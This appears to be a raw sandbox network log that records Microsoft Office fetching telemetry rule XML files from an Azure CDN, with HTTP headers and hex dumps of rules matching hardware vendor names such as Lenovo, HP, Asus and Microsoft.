                                                                                                                                            2024-10-31 16:13:01 UTC569INHTTP/1.1 200 OK
                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                            Expires: Thu, 31 Oct 2024 16:12:01 GMT
                                                                                                                                            P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                            x-ms-route-info: C504_BL2
                                                                                                                                            x-ms-request-id: bf83db36-d74e-4e99-8646-833598edb427
                                                                                                                                            PPServer: PPV: 30 H: BL02EPF0001D783 V: 0
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:00 GMT
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 11412
                                                                                                                                            2024-10-31 16:13:01 UTC11412INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            19192.168.2.44977713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:01 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:01 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 471
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                            x-ms-request-id: a53a16c0-d01e-00ad-32e8-2ae942000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161301Z-15b8d89586fmhjx6a8nf3qm53c00000003g000000000nxce
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:01 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            20192.168.2.44977813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:01 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:01 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 467
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                            x-ms-request-id: d5f61869-301e-0051-4d7a-2b38bb000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161301Z-159b85dff8fbbwhzhC1DFWwpe800000002600000000069qt
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:01 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            21192.168.2.44977613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:01 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:01 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 415
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                            x-ms-request-id: 633f9008-101e-00a2-3e9b-279f2e000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161301Z-16849878b7828dsgct3vrzta70000000081g00000000xpr6
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:01 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            22192.168.2.44977913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:01 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:01 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 632
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                            x-ms-request-id: 557cfad9-601e-0097-7970-2af33a000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161301Z-159b85dff8f5bl2qhC1DFWs6cn00000001r0000000009nm9
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:01 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            23192.168.2.44977513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:01 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:01 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 474
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                            x-ms-request-id: 39bd4d12-701e-0098-1133-2a395f000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161301Z-15b8d89586fzhrwgk23ex2bvhw0000000crg00000000db31
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:01 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            24192.168.2.44978013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:02 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:02 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 407
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                            x-ms-request-id: 3c9c0adf-d01e-0028-0c96-257896000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161302Z-16849878b786fl7gm2qg4r5y7000000009zg00000000mwww
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:02 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            25192.168.2.44978113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:02 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:02 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 486
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                            x-ms-request-id: 0fe0dd21-c01e-0066-771c-26a1ec000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161302Z-16849878b78bcpfn2qf7sm6hsn0000000bd0000000009d3a
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:02 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            26192.168.2.44978313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:02 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:02 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 486
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                            x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161302Z-16849878b78nzcqcd7bed2fb6n000000022000000000zkhq
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:02 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            27192.168.2.44978213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:02 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:02 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 427
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                            x-ms-request-id: fcb0891e-801e-007b-6669-28e7ab000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161302Z-15b8d89586fbmg6qpd9yf8zhm000000004mg00000000ezvr
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:02 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            28192.168.2.44978413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:02 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:02 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 407
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                            x-ms-request-id: d7faccb9-c01e-002b-307f-276e00000000
                                                                                                                                            x-ms-version: 2018-03-28
